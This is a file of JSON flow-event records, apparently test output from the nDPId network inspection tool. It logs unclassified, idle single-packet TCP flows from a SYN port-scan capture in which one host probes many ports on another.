-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6969,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6969,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6969,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6969,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2875,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2875,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":843,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":843,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":843,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":843,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
